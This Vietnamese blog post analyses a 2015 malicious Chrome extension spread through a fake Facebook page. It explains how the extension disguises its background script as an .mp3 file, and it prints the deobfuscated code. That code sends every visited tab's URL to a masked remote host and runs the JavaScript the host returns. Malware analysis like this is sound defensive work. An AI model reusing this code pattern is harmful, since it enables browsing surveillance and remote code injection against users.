Hôm qua "anh Juno" vừa chia sẻ video 7 cách bảo vệ bạn trước các hacker trên trang Juno_okyo's Blog thì hôm nay trên Faceb...
Phân tích mã độc mới trên Facebook 15/11/2015 |
Phân tích loại virus mới trên facebook |
Sau khi nhấn vào thông báo, thay vì chuyển hướng tới bình luận như mọi khi thì người dùng sẽ bị chuyển hướng sang một trang web có giao diện giống hệt Facebook.
Loại virus mới trên facebook |
Sau khi truy cập khoảng 5 giây sẽ có một thông báo yêu cầu cài đặt Extension vào trình duyệt. Tại sao trang web có thể hiển thị thông báo như khi bạn nhấn nút cài đặt Extension trên Chrome Store? Đó là vì kẻ tấn công đã sử dụng phương thức Cài đặt nội tuyến (Inline Installation). "Nếu bạn lỡ cài Extensive này thì nên xóa ngay, đăng nhập tài khoản facebook từ mọi nơi và đổi mật khẩu vì nếu không thì bạn đã dính loại "virus facebook 2015" mới rồi đấy nhé"
Tất nhiên là tôi sẽ không cài đặt rồi. Bằng một số thủ thuật tìm thấy trên Google, tôi tải được tập tin CRX (đuôi mở rộng của Extension) về máy.
Phân tích mã độc
Loại virus mới trên facebook |
Loại virus mới trên facebook |
CRX thực chất là một định dạng nén đặc biệt của Extension, giống như đuôi JAR của tập tin JAVA. Tức là ta có thể xem nội dung bên trong như một tập tin nén thông thường.
Trong phần mở rộng này có một tập tin khá đặc biệt là 639040963078.mp3 (tập tin MP3 rất ít khi được sử dụng trong Extension). Quét thử với Virus Total thì kết quả có vẻ cũng không "nguy hiểm" lắm.
Tôi liền mở tập tin manifest.json ra coi. Đây là tập tin chứa các thông tin cơ bản và quyền hạn của một Extension.
Phần quyền hạn (permission) có vẻ khá nhạy cảm. Nó quản lý các tab và mọi trang web mà bạn truy cập (kể cả trang web đó sử dụng giao thức bảo mật HTTPS).
Nhưng có một điểm thú vị hơn là phần kịch bản chạy nền (background):"background":{ "scripts":["639040963078.mp3"] }
Tại sao tôi lại nói là thú vị? Vì phần này khai báo HTML hoặc JavaScript nhưng tác giả của Extension lại trỏ vào tập tin *.mp3
Loại virus mới trên facebook |
Tôi liền đổi đuôi tập tin 639040963078.mp3 thành 639040963078.js và mở lên xem nội dung.
Đoạn mã đã được làm rối (Obfuscated), tuy nhiên mã khá ngắn nên không tốn nhiều thời gian lắm để lấy lại đoạn mã ban đầu:
window.chrome.tabs.onUpdated.addListener(function(wyqhrr) { window.chrome.tabs.get(wyqhrr, function(tab) { if (tab.status == 'complete') { var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://xxx.xyz/z.php?url=' + tab.url, true); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { window.chrome.tabs.executeScript(tab.id, { code: xhr.responseText }); } } xhr.send(); } }) })
Chú ý: Tên miền trong đoạn mã chứa mã độc nên tôi đã ẩn.
Đoạn mã trên sẽ lắng nghe sự kiện mỗi khi người dùng mở tab mới hoặc tab được điều hướng. Khi sự kiện này xảy ra nó sẽ thực thi một đoạn mã độc từ xa. Nội dung mã độc mới được lấy thông qua Ajax.
Bài viết cũng đã khá dài. Tôi sẽ tiếp tục phân tích đoạn mã độc được thực thi trong phần 2.
Để tìm hiểu thêm cũng như biết về loại virus facebook mới 2015 này bạn đón xem từ K2zblog.com nhé !
Nguồn: JunoOkyo - JunoOkyo'sBlog
Không có nhận xét nào:
Đăng nhận xét